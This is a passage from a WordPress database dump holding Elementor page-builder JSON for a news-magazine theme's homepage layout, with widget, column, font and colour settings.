"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#04f7a2\",\"typography_font_size\":{\"unit\":\"px\",\"size\":13},\"typography_typography\":\"custom\",\"typography_font_family\":\"Tahoma\",\"_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"2\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"7oi6ecb\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"hwmopge\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"82k0jjs\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"2\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"g7mt24q\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"size\":\"small\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0qdx6b8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tatpigw\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cfab1ec\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"category\":[\"2\"],\"choose_column\":\"4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false}]'),(1311,461,'_elementor_version','0.4'),(1313,462,'_elementor_edit_mode','builder'),(1314,462,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay